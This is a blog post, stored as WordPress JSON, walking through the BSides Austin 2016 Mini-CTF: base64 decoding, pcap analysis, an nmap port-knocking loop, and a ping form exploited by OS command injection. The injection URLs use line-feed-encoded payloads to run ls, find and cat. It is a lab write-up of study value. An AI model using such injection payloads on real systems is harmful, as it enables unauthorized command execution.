{"id":650,"date":"2016-04-04T11:34:32","date_gmt":"2016-04-04T16:34:32","guid":{"rendered":"http:\/\/www.webadminblog.com\/?p=650"},"modified":"2016-04-04T11:45:32","modified_gmt":"2016-04-04T16:45:32","slug":"completing-the-bsides-austin-2016-mini-ctf","status":"publish","type":"post","link":"https:\/\/www.webadminblog.com\/index.php\/2016\/04\/04\/completing-the-bsides-austin-2016-mini-ctf\/","title":{"rendered":"Completing the BSides Austin 2016 Mini-CTF"},"content":{"rendered":"<p>The BSides Austin 2016 Mini-CTF began with the back of the badge. \u00a0There was a large QR code which took a very long time for me to scan with my phone, and when I finally got it, it was just the numbers\u00a0\u201c07263584\u201d. \u00a0Not very useful. \u00a0Below that, however, there was \u00a0a string of letters and numbers as follows:<\/p>\n<p style=\"padding-left: 30px;\"><em>aHR0cDovL2N0Zi5ic2lkZXNhdXN0aW4ub3JnL2xldmVsMS8=<\/em><\/p>\n<div>The string very obviously looked like BASE64 so I decoded it to get the following URL:<\/div>\n<p style=\"padding-left: 30px;\"><a href=\"http:\/\/ctf.bsidesaustin.org\/level1\/\">http:\/\/ctf.bsidesaustin.org\/level1\/<\/a><\/p>\n<div>On that page it reads:<\/div>\n<div><\/div>\n<div><\/div>\n<p style=\"padding-left: 30px;\">That start was easy! You have shown that you are curious and that is the key. As your reward, you may have this:flag 1: BSides{D3c0d3s_R_3Z}Do you want to play some more? If so, read on&#8230;<\/p>\n<p style=\"padding-left: 30px;\">1. Turn in flags by sending an email to <a href=\"mailto:bsidesaustin@gmail.com\">bsidesaustin@gmail.com<\/a>. The email must contain your name, email address, and the flag you are turning in<\/p>\n<p style=\"padding-left: 30px;\">2. There are three flags total, each should be submitted via email.<\/p>\n<p style=\"padding-left: 30px;\">3. Do not scan this server with automated tools. They are not necessary and could cause performance issues. If you scan this server, you could be disqualified.<\/p>\n<p style=\"padding-left: 30px;\">4. Send in flag 1 then click <a href=\"http:\/\/ctf.bsidesaustin.org\/level2\/9slfowiuwer98987987kljsdfljsdf\/\">here<\/a> to continue&#8230;<\/p>\n<div>I submitted the flag and moved on to the next page at:<\/div>\n<div><\/div>\n<div><\/div>\n<p style=\"padding-left: 30px;\"><a href=\"http:\/\/ctf.bsidesaustin.org\/level2\/9slfowiuwer98987987kljsdfljsdf\/\">http:\/\/ctf.bsidesaustin.org\/level2\/9slfowiuwer98987987kljsdfljsdf\/<\/a><\/p>\n<div><\/div>\n<div>On that page there was a file named coms.pcap. \u00a0With the \u201cpcap\u201d extension, I went ahead and loaded up into Wireshark. \u00a0It was a 1113 line packet capture file with encrypted Google traffic, YouTube rick rolls, and more. \u00a0Only a handful of the requests were for 45.32.195.232, the IP address belonging to ctf.bsidesaustin.org. \u00a0When I followed the TCP stream, it was for a request to <a href=\"http:\/\/ctf.bsidesaustin.org:31337\/level3\/index.html,\">http:\/\/ctf.bsidesaustin.org:31337\/level3\/index.html<\/a>. \u00a0When I went to that URL, however, it was as if nothing was listening. \u00a0Eventually, I filtered the pcap by that IP as the destination and found a sequence of requests to that IP at odd ports\u20261025\u20262300\u20261337\u20261337. \u00a0This smelled suspiciously of port knocking so I wrote a quick bash script using nmap to test it out:<\/div>\n<div><\/div>\n<div><\/div>\n<p style=\"padding-left: 30px;\">for x in 1025 2300 1337; do nmap -Pn &#8211;host_timeout 201 &#8211;max-retries 0 -p $x 45.32.195.232; done<\/p>\n<div><\/div>\n<div>Finally, I hit the page on port 31337:<\/div>\n<div><\/div>\n<div><\/div>\n<p style=\"padding-left: 30px;\"><a href=\"http:\/\/ctf.bsidesaustin.org:31337\/level3\/index.html\">http:\/\/ctf.bsidesaustin.org:31337\/level3\/index.html<\/a><\/p>\n<div><\/div>\n<div>Sure enough, now I get a response that says:<\/div>\n<div><\/div>\n<div><\/div>\n<p style=\"padding-left: 30px;\">Congratulations, you have completed the second challenge!The second flag is: BSidesAustin{C4rV1NG_UP_PC4Ps}<\/p>\n<p style=\"padding-left: 30px;\">Click <a href=\"http:\/\/ctf.bsidesaustin.org:31337\/level3\/owiroewuouoiu\">here<\/a> to continue to the final challenge!<\/p>\n<div><\/div>\n<div>I submitted the flag and moved on to the next page at:<\/div>\n<div><\/div>\n<div><\/div>\n<p style=\"padding-left: 30px;\"><a href=\"http:\/\/ctf.bsidesaustin.org:31337\/level3\/owiroewuouoiu\">http:\/\/ctf.bsidesaustin.org:31337\/level3\/owiroewuouoiu<\/a><\/p>\n<div><\/div>\n<div>On this page we see a network interface test where you can specify an IP as a ping destination, and when you hit \u201cEnter\u201d, it gives you the results of the ping:<\/div>\n<div><\/div>\n<div><\/div>\n<p style=\"padding-left: 30px;\">PING\u00a0127.0.0.1\u00a0(127.0.0.1)\u00a056(84)\u00a0bytes\u00a0of\u00a0data.<br \/>\n64\u00a0bytes\u00a0from\u00a0127.0.0.1:\u00a0icmp_seq=1\u00a0ttl=64\u00a0time=0.026\u00a0ms&#8212;\u00a0127.0.0.1\u00a0ping\u00a0statistics\u00a0&#8212;<br \/>\n1\u00a0packets\u00a0transmitted,\u00a01\u00a0received,\u00a00%\u00a0packet\u00a0loss,\u00a0time\u00a00ms<\/p>\n<p style=\"padding-left: 30px;\">rtt\u00a0min\/avg\/max\/mdev\u00a0=\u00a00.026\/0.026\/0.026\/0.000\u00a0ms<\/p>\n<div><\/div>\n<div>Entering some non-IP address information, I got a message like:<\/div>\n<div><\/div>\n<div><\/div>\n<p style=\"padding-left: 30px;\">Error\u00a0running\u00a0ping\u00a0-c\u00a01\u00a0127.0.0.1<\/p>\n<div><\/div>\n<div>So, there is some filtering on it, but it also looks like some data is making it through. \u00a0I figured out that I could specify the destination as a GET instead of the POST with by adding \u201c?dest=127.0.0.1\u201d to the URL and that worked.\u00a0 I tried a bunch of different combinations of \u201c;\u201d, \u201c&amp;&amp;\u201d, and other OS command functions that would piggyback on the existing function with no luck. \u00a0Eventually, I figured out that \u201c%0A\u201d, the ASCII line feed control character, was not filtered and I could use that to run more commands. \u00a0For example:<\/div>\n<div><\/div>\n<div><\/div>\n<p style=\"padding-left: 30px;\"><a href=\"http:\/\/ctf.bsidesaustin.org:31337\/level3\/owiroewuouoiu\/index.cgi?dest=127.0.0.1%0ls\">http:\/\/ctf.bsidesaustin.org:31337\/level3\/owiroewuouoiu\/index.cgi?dest=127.0.0.1%0ls<\/a><\/p>\n<div><\/div>\n<div>Returned a listing of \u201cindex.cgi\u201d and \u201cthe\u201d in that directory. \u00a0Then:<\/div>\n<div><\/div>\n<div><\/div>\n<p style=\"padding-left: 30px;\"><a href=\"http:\/\/ctf.bsidesaustin.org:31337\/level3\/owiroewuouoiu\/index.cgi?dest=127.0.0.1%0find\">http:\/\/ctf.bsidesaustin.org:31337\/level3\/owiroewuouoiu\/index.cgi?dest=127.0.0.1%0find<\/a><\/p>\n<div><\/div>\n<div>Showed that \u201cthe\u201d actually expanded to \u201c\/the\/roof\/the\/roof\/the\/roof\/is\/on\/fire\/flag.txt\u201d. \u00a0Sweet! \u00a0I found the flag! \u00a0Now to open it.<\/div>\n<div><\/div>\n<div style=\"padding-left: 30px;\"><\/div>\n<p style=\"padding-left: 30px;\"><a href=\"http:\/\/ctf.bsidesaustin.org:31337\/level3\/owiroewuouoiu\/index.cgi?dest=127.0.0.1%0Acat%3C.\/the\/roof\/the\/roof\/the\/roof\/is\/on\/fire\/flag.txt\">http:\/\/ctf.bsidesaustin.org:31337\/level3\/owiroewuouoiu\/index.cgi?dest=127.0.0.1%0Acat%3C.\/the\/roof\/the\/roof\/the\/roof\/is\/on\/fire\/flag.txt<\/a><\/p>\n<div><\/div>\n<div>That returned:<\/div>\n<div><\/div>\n<div><\/div>\n<p style=\"padding-left: 30px;\">PING\u00a0127.0.0.1\u00a0(127.0.0.1)\u00a056(84)\u00a0bytes\u00a0of\u00a0data.<br \/>\n64\u00a0bytes\u00a0from\u00a0127.0.0.1:\u00a0icmp_seq=1\u00a0ttl=64\u00a0time=0.026\u00a0ms&#8212;\u00a0127.0.0.1\u00a0ping\u00a0statistics\u00a0&#8212;<br \/>\n1\u00a0packets\u00a0transmitted,\u00a01\u00a0received,\u00a00%\u00a0packet\u00a0loss,\u00a0time\u00a00ms<br \/>\nrtt\u00a0min\/avg\/max\/mdev\u00a0=\u00a00.026\/0.026\/0.026\/0.000\u00a0ms<br \/>\nGreat\u00a0job!\u00a0The\u00a0third\u00a0and\u00a0final\u00a0flag\u00a0is:BSidesAustin{F1lt3rs_R_Fun}<\/p>\n<p style=\"padding-left: 30px;\">Congratulations,\u00a0you\u00a0have\u00a0completed\u00a0the\u00a0challenge!<\/p>\n<div><\/div>\n<div>Final flag submitted. \u00a0Game over!<\/div>\n","protected":false},"excerpt":{"rendered":"<p>The BSides Austin 2016 Mini-CTF began with the back of the badge. \u00a0There was a large QR code which took a very long time for me to scan with my phone, and when I finally got it, it was just the numbers\u00a0\u201c07263584\u201d. \u00a0Not very useful. \u00a0Below that, however, there was \u00a0a string of letters and [&hellip;]<\/p>\n","protected":false},"author":3,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":true,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[645,517],"tags":[646,423,521,518,519,648,647],"class_list":["post-650","post","type-post","status-publish","format-standard","hentry","category-bsides-austin-2016","category-capture-the-flag","tag-646","tag-austin","tag-bsides","tag-capture","tag-flag","tag-mini-ctf","tag-the"],"aioseo_notices":[],"aioseo_head":"\n\t\t<!-- All in One SEO 4.9.10 - aioseo.com -->\n\t<meta name=\"description\" content=\"The BSides Austin 2016 Mini-CTF began with the back of the badge. There was a large QR code which took a very long time for me to scan with my phone, and when I finally got it, it was just the numbers \u201c07263584\u201d. Not very useful. Below that, however, there was a string of letters and\" \/>\n\t<meta name=\"robots\" content=\"max-image-preview:large\" \/>\n\t<meta name=\"author\" content=\"Josh\"\/>\n\t<link rel=\"canonical\" href=\"https:\/\/www.webadminblog.com\/index.php\/2016\/04\/04\/completing-the-bsides-austin-2016-mini-ctf\/\" \/>\n\t<meta name=\"generator\" content=\"All in One SEO (AIOSEO) 4.9.10\" \/>\n\t\t<meta property=\"og:locale\" content=\"en_US\" \/>\n\t\t<meta property=\"og:site_name\" content=\"Web Admin Blog | Real Web Admins.  Real World Experience.\" \/>\n\t\t<meta property=\"og:type\" content=\"article\" \/>\n\t\t<meta property=\"og:title\" content=\"Completing the BSides Austin 2016 Mini-CTF | Web Admin Blog\" \/>\n\t\t<meta property=\"og:description\" content=\"The BSides Austin 2016 Mini-CTF began with the back of the badge. There was a large QR code which took a very long time for me to scan with my phone, and when I finally got it, it was just the numbers \u201c07263584\u201d. Not very useful. Below that, however, there was a string of letters and\" \/>\n\t\t<meta property=\"og:url\" content=\"https:\/\/www.webadminblog.com\/index.php\/2016\/04\/04\/completing-the-bsides-austin-2016-mini-ctf\/\" \/>\n\t\t<meta property=\"article:published_time\" content=\"2016-04-04T16:34:32+00:00\" \/>\n\t\t<meta property=\"article:modified_time\" content=\"2016-04-04T16:45:32+00:00\" \/>\n\t\t<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n\t\t<meta name=\"twitter:title\" content=\"Completing the BSides Austin 2016 Mini-CTF | Web Admin Blog\" \/>\n\t\t<meta name=\"twitter:description\" content=\"The BSides Austin 2016 Mini-CTF began with the back of the badge. There was a large QR code which took a very long time for me to scan with my phone, and when I finally got it, it was just the numbers \u201c07263584\u201d. Not very useful. Below that, however, there was a string of letters and\" \/>\n\t\t<script type=\"application\/ld+json\" class=\"aioseo-schema\">\n\t\t\t{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.webadminblog.com\\\/index.php\\\/2016\\\/04\\\/04\\\/completing-the-bsides-austin-2016-mini-ctf\\\/#article\",\"name\":\"Completing the BSides Austin 2016 Mini-CTF | Web Admin Blog\",\"headline\":\"Completing the BSides Austin 2016 Mini-CTF\",\"author\":{\"@id\":\"https:\\\/\\\/www.webadminblog.com\\\/index.php\\\/author\\\/jsokol\\\/#author\"},\"publisher\":{\"@id\":\"https:\\\/\\\/www.webadminblog.com\\\/#organization\"},\"datePublished\":\"2016-04-04T11:34:32-05:00\",\"dateModified\":\"2016-04-04T11:45:32-05:00\",\"inLanguage\":\"en-US\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.webadminblog.com\\\/index.php\\\/2016\\\/04\\\/04\\\/completing-the-bsides-austin-2016-mini-ctf\\\/#webpage\"},\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.webadminblog.com\\\/index.php\\\/2016\\\/04\\\/04\\\/completing-the-bsides-austin-2016-mini-ctf\\\/#webpage\"},\"articleSection\":\"BSides Austin 2016, Capture the Flag, 2016, austin, bsides, capture, flag, mini-ctf, the\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.webadminblog.com\\\/index.php\\\/2016\\\/04\\\/04\\\/completing-the-bsides-austin-2016-mini-ctf\\\/#breadcrumblist\",\"itemListElement\":[{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/www.webadminblog.com#listItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.webadminblog.com\",\"nextItem\":{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/www.webadminblog.com\\\/index.php\\\/category\\\/security\\\/#listItem\",\"name\":\"Security\"}},{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/www.webadminblog.com\\\/index.php\\\/category\\\/security\\\/#listItem\",\"position\":2,\"name\":\"Security\",\"item\":\"https:\\\/\\\/www.webadminblog.com\\\/index.php\\\/category\\\/security\\\/\",\"nextItem\":{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/www.webadminblog.com\\\/index.php\\\/category\\\/security\\\/capture-the-flag\\\/#listItem\",\"name\":\"Capture the Flag\"},\"previousItem\":{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/www.webadminblog.com#listItem\",\"name\":\"Home\"}},{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/www.webadminblog.com\\\/index.php\\\/category\\\/security\\\/capture-the-flag\\\/#listItem\",\"position\":3,\"name\":\"Capture the Flag\",\"item\":\"https:\\\/\\\/www.webadminblog.com\\\/index.php\\\/category\\\/security\\\/capture-the-flag\\\/\",\"nextItem\":{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/www.webadminblog.com\\\/index.php\\\/2016\\\/04\\\/04\\\/completing-the-bsides-austin-2016-mini-ctf\\\/#listItem\",\"name\":\"Completing the BSides Austin 2016 Mini-CTF\"},\"previousItem\":{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/www.webadminblog.com\\\/index.php\\\/category\\\/security\\\/#listItem\",\"name\":\"Security\"}},{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/www.webadminblog.com\\\/index.php\\\/2016\\\/04\\\/04\\\/completing-the-bsides-austin-2016-mini-ctf\\\/#listItem\",\"position\":4,\"name\":\"Completing the BSides Austin 2016 Mini-CTF\",\"previousItem\":{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/www.webadminblog.com\\\/index.php\\\/category\\\/security\\\/capture-the-flag\\\/#listItem\",\"name\":\"Capture the Flag\"}}]},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.webadminblog.com\\\/#organization\",\"name\":\"Web Admin Blog\",\"description\":\"Real Web Admins.  Real World Experience.\",\"url\":\"https:\\\/\\\/www.webadminblog.com\\\/\"},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.webadminblog.com\\\/index.php\\\/author\\\/jsokol\\\/#author\",\"url\":\"https:\\\/\\\/www.webadminblog.com\\\/index.php\\\/author\\\/jsokol\\\/\",\"name\":\"Josh\",\"image\":{\"@type\":\"ImageObject\",\"@id\":\"https:\\\/\\\/www.webadminblog.com\\\/index.php\\\/2016\\\/04\\\/04\\\/completing-the-bsides-austin-2016-mini-ctf\\\/#authorImage\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/17951f69795527f90a4e9cb75ad6c9b3?s=96&d=identicon&r=pg\",\"width\":96,\"height\":96,\"caption\":\"Josh\"}},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.webadminblog.com\\\/index.php\\\/2016\\\/04\\\/04\\\/completing-the-bsides-austin-2016-mini-ctf\\\/#webpage\",\"url\":\"https:\\\/\\\/www.webadminblog.com\\\/index.php\\\/2016\\\/04\\\/04\\\/completing-the-bsides-austin-2016-mini-ctf\\\/\",\"name\":\"Completing the BSides Austin 2016 Mini-CTF | Web Admin Blog\",\"description\":\"The BSides Austin 2016 Mini-CTF began with the back of the badge. There was a large QR code which took a very long time for me to scan with my phone, and when I finally got it, it was just the numbers \\u201c07263584\\u201d. Not very useful. Below that, however, there was a string of letters and\",\"inLanguage\":\"en-US\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.webadminblog.com\\\/#website\"},\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.webadminblog.com\\\/index.php\\\/2016\\\/04\\\/04\\\/completing-the-bsides-austin-2016-mini-ctf\\\/#breadcrumblist\"},\"author\":{\"@id\":\"https:\\\/\\\/www.webadminblog.com\\\/index.php\\\/author\\\/jsokol\\\/#author\"},\"creator\":{\"@id\":\"https:\\\/\\\/www.webadminblog.com\\\/index.php\\\/author\\\/jsokol\\\/#author\"},\"datePublished\":\"2016-04-04T11:34:32-05:00\",\"dateModified\":\"2016-04-04T11:45:32-05:00\"},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.webadminblog.com\\\/#website\",\"url\":\"https:\\\/\\\/www.webadminblog.com\\\/\",\"name\":\"Web Admin Blog\",\"description\":\"Real Web Admins.  Real World Experience.\",\"inLanguage\":\"en-US\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.webadminblog.com\\\/#organization\"}}]}\n\t\t<\/script>\n\t\t<!-- All in One SEO -->\n\n","aioseo_head_json":{"title":"Completing the BSides Austin 2016 Mini-CTF | Web Admin Blog","description":"The BSides Austin 2016 Mini-CTF began with the back of the badge. There was a large QR code which took a very long time for me to scan with my phone, and when I finally got it, it was just the numbers \u201c07263584\u201d. Not very useful. Below that, however, there was a string of letters and","canonical_url":"https:\/\/www.webadminblog.com\/index.php\/2016\/04\/04\/completing-the-bsides-austin-2016-mini-ctf\/","robots":"max-image-preview:large","keywords":"","webmasterTools":{"miscellaneous":""},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.webadminblog.com\/index.php\/2016\/04\/04\/completing-the-bsides-austin-2016-mini-ctf\/#article","name":"Completing the BSides Austin 2016 Mini-CTF | Web Admin Blog","headline":"Completing the BSides Austin 2016 Mini-CTF","author":{"@id":"https:\/\/www.webadminblog.com\/index.php\/author\/jsokol\/#author"},"publisher":{"@id":"https:\/\/www.webadminblog.com\/#organization"},"datePublished":"2016-04-04T11:34:32-05:00","dateModified":"2016-04-04T11:45:32-05:00","inLanguage":"en-US","mainEntityOfPage":{"@id":"https:\/\/www.webadminblog.com\/index.php\/2016\/04\/04\/completing-the-bsides-austin-2016-mini-ctf\/#webpage"},"isPartOf":{"@id":"https:\/\/www.webadminblog.com\/index.php\/2016\/04\/04\/completing-the-bsides-austin-2016-mini-ctf\/#webpage"},"articleSection":"BSides Austin 2016, Capture the Flag, 2016, austin, bsides, capture, flag, mini-ctf, the"},{"@type":"BreadcrumbList","@id":"https:\/\/www.webadminblog.com\/index.php\/2016\/04\/04\/completing-the-bsides-austin-2016-mini-ctf\/#breadcrumblist","itemListElement":[{"@type":"ListItem","@id":"https:\/\/www.webadminblog.com#listItem","position":1,"name":"Home","item":"https:\/\/www.webadminblog.com","nextItem":{"@type":"ListItem","@id":"https:\/\/www.webadminblog.com\/index.php\/category\/security\/#listItem","name":"Security"}},{"@type":"ListItem","@id":"https:\/\/www.webadminblog.com\/index.php\/category\/security\/#listItem","position":2,"name":"Security","item":"https:\/\/www.webadminblog.com\/index.php\/category\/security\/","nextItem":{"@type":"ListItem","@id":"https:\/\/www.webadminblog.com\/index.php\/category\/security\/capture-the-flag\/#listItem","name":"Capture the Flag"},"previousItem":{"@type":"ListItem","@id":"https:\/\/www.webadminblog.com#listItem","name":"Home"}},{"@type":"ListItem","@id":"https:\/\/www.webadminblog.com\/index.php\/category\/security\/capture-the-flag\/#listItem","position":3,"name":"Capture the Flag","item":"https:\/\/www.webadminblog.com\/index.php\/category\/security\/capture-the-flag\/","nextItem":{"@type":"ListItem","@id":"https:\/\/www.webadminblog.com\/index.php\/2016\/04\/04\/completing-the-bsides-austin-2016-mini-ctf\/#listItem","name":"Completing the BSides Austin 2016 Mini-CTF"},"previousItem":{"@type":"ListItem","@id":"https:\/\/www.webadminblog.com\/index.php\/category\/security\/#listItem","name":"Security"}},{"@type":"ListItem","@id":"https:\/\/www.webadminblog.com\/index.php\/2016\/04\/04\/completing-the-bsides-austin-2016-mini-ctf\/#listItem","position":4,"name":"Completing the BSides Austin 2016 Mini-CTF","previousItem":{"@type":"ListItem","@id":"https:\/\/www.webadminblog.com\/index.php\/category\/security\/capture-the-flag\/#listItem","name":"Capture the Flag"}}]},{"@type":"Organization","@id":"https:\/\/www.webadminblog.com\/#organization","name":"Web Admin Blog","description":"Real Web Admins.  Real World Experience.","url":"https:\/\/www.webadminblog.com\/"},{"@type":"Person","@id":"https:\/\/www.webadminblog.com\/index.php\/author\/jsokol\/#author","url":"https:\/\/www.webadminblog.com\/index.php\/author\/jsokol\/","name":"Josh","image":{"@type":"ImageObject","@id":"https:\/\/www.webadminblog.com\/index.php\/2016\/04\/04\/completing-the-bsides-austin-2016-mini-ctf\/#authorImage","url":"https:\/\/secure.gravatar.com\/avatar\/17951f69795527f90a4e9cb75ad6c9b3?s=96&d=identicon&r=pg","width":96,"height":96,"caption":"Josh"}},{"@type":"WebPage","@id":"https:\/\/www.webadminblog.com\/index.php\/2016\/04\/04\/completing-the-bsides-austin-2016-mini-ctf\/#webpage","url":"https:\/\/www.webadminblog.com\/index.php\/2016\/04\/04\/completing-the-bsides-austin-2016-mini-ctf\/","name":"Completing the BSides Austin 2016 Mini-CTF | Web Admin Blog","description":"The BSides Austin 2016 Mini-CTF began with the back of the badge. There was a large QR code which took a very long time for me to scan with my phone, and when I finally got it, it was just the numbers \u201c07263584\u201d. Not very useful. Below that, however, there was a string of letters and","inLanguage":"en-US","isPartOf":{"@id":"https:\/\/www.webadminblog.com\/#website"},"breadcrumb":{"@id":"https:\/\/www.webadminblog.com\/index.php\/2016\/04\/04\/completing-the-bsides-austin-2016-mini-ctf\/#breadcrumblist"},"author":{"@id":"https:\/\/www.webadminblog.com\/index.php\/author\/jsokol\/#author"},"creator":{"@id":"https:\/\/www.webadminblog.com\/index.php\/author\/jsokol\/#author"},"datePublished":"2016-04-04T11:34:32-05:00","dateModified":"2016-04-04T11:45:32-05:00"},{"@type":"WebSite","@id":"https:\/\/www.webadminblog.com\/#website","url":"https:\/\/www.webadminblog.com\/","name":"Web Admin Blog","description":"Real Web Admins.  Real World Experience.","inLanguage":"en-US","publisher":{"@id":"https:\/\/www.webadminblog.com\/#organization"}}]},"og:locale":"en_US","og:site_name":"Web Admin Blog | Real Web Admins.  Real World Experience.","og:type":"article","og:title":"Completing the BSides Austin 2016 Mini-CTF | Web Admin Blog","og:description":"The BSides Austin 2016 Mini-CTF began with the back of the badge. There was a large QR code which took a very long time for me to scan with my phone, and when I finally got it, it was just the numbers \u201c07263584\u201d. Not very useful. Below that, however, there was a string of letters and","og:url":"https:\/\/www.webadminblog.com\/index.php\/2016\/04\/04\/completing-the-bsides-austin-2016-mini-ctf\/","article:published_time":"2016-04-04T16:34:32+00:00","article:modified_time":"2016-04-04T16:45:32+00:00","twitter:card":"summary_large_image","twitter:title":"Completing the BSides Austin 2016 Mini-CTF | Web Admin Blog","twitter:description":"The BSides Austin 2016 Mini-CTF began with the back of the badge. There was a large QR code which took a very long time for me to scan with my phone, and when I finally got it, it was just the numbers \u201c07263584\u201d. Not very useful. Below that, however, there was a string of letters and"},"aioseo_meta_data":{"post_id":"650","title":null,"description":null,"keywords":null,"keyphrases":null,"primary_term":null,"canonical_url":null,"og_title":null,"og_description":null,"og_object_type":"default","og_image_type":"default","og_image_url":null,"og_image_width":null,"og_image_height":null,"og_image_custom_url":null,"og_image_custom_fields":null,"og_video":null,"og_custom_url":null,"og_article_section":null,"og_article_tags":null,"twitter_use_og":false,"twitter_card":"default","twitter_image_type":"default","twitter_image_url":null,"twitter_image_custom_url":null,"twitter_image_custom_fields":null,"twitter_title":null,"twitter_description":null,"schema":{"blockGraphs":[],"customGraphs":[],"default":{"data":{"Article":[],"Course":[],"Dataset":[],"FAQPage":[],"Movie":[],"Person":[],"Product":[],"ProductReview":[],"Car":[],"Recipe":[],"Service":[],"SoftwareApplication":[],"WebPage":[]},"graphName":"","isEnabled":true},"graphs":[]},"schema_type":"default","schema_type_options":null,"pillar_content":false,"robots_default":true,"robots_noindex":false,"robots_noarchive":false,"robots_nosnippet":false,"robots_nofollow":false,"robots_noimageindex":false,"robots_noodp":false,"robots_notranslate":false,"robots_max_snippet":null,"robots_max_videopreview":null,"robots_max_imagepreview":"large","priority":null,"frequency":null,"local_seo":null,"breadcrumb_settings":null,"limit_modified_date":false,"ai":null,"created":"2025-01-03 18:40:04","updated":"2025-07-17 07:20:25","seo_analyzer_scan_date":null},"aioseo_breadcrumb":"<div class=\"aioseo-breadcrumbs\"><span class=\"aioseo-breadcrumb\">\n\t\t\t<a href=\"https:\/\/www.webadminblog.com\" title=\"Home\">Home<\/a>\n\t\t<\/span><span class=\"aioseo-breadcrumb-separator\">&raquo;<\/span><span class=\"aioseo-breadcrumb\">\n\t\t\t<a href=\"https:\/\/www.webadminblog.com\/index.php\/category\/security\/\" title=\"Security\">Security<\/a>\n\t\t<\/span><span class=\"aioseo-breadcrumb-separator\">&raquo;<\/span><span class=\"aioseo-breadcrumb\">\n\t\t\t<a href=\"https:\/\/www.webadminblog.com\/index.php\/category\/security\/capture-the-flag\/\" title=\"Capture the Flag\">Capture the Flag<\/a>\n\t\t<\/span><span class=\"aioseo-breadcrumb-separator\">&raquo;<\/span><span class=\"aioseo-breadcrumb\">\n\t\t\tCompleting the BSides Austin 2016 Mini-CTF\n\t\t<\/span><\/div>","aioseo_breadcrumb_json":[{"label":"Home","link":"https:\/\/www.webadminblog.com"},{"label":"Security","link":"https:\/\/www.webadminblog.com\/index.php\/category\/security\/"},{"label":"Capture the Flag","link":"https:\/\/www.webadminblog.com\/index.php\/category\/security\/capture-the-flag\/"},{"label":"Completing the BSides Austin 2016 Mini-CTF","link":"https:\/\/www.webadminblog.com\/index.php\/2016\/04\/04\/completing-the-bsides-austin-2016-mini-ctf\/"}],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_shortlink":"https:\/\/wp.me\/pfI0c-au","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/www.webadminblog.com\/index.php\/wp-json\/wp\/v2\/posts\/650","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.webadminblog.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.webadminblog.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.webadminblog.com\/index.php\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/www.webadminblog.com\/index.php\/wp-json\/wp\/v2\/comments?post=650"}],"version-history":[{"count":8,"href":"https:\/\/www.webadminblog.com\/index.php\/wp-json\/wp\/v2\/posts\/650\/revisions"}],"predecessor-version":[{"id":658,"href":"https:\/\/www.webadminblog.com\/index.php\/wp-json\/wp\/v2\/posts\/650\/revisions\/658"}],"wp:attachment":[{"href":"https:\/\/www.webadminblog.com\/index.php\/wp-json\/wp\/v2\/media?parent=650"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.webadminblog.com\/index.php\/wp-json\/wp\/v2\/categories?post=650"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.webadminblog.com\/index.php\/wp-json\/wp\/v2\/tags?post=650"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}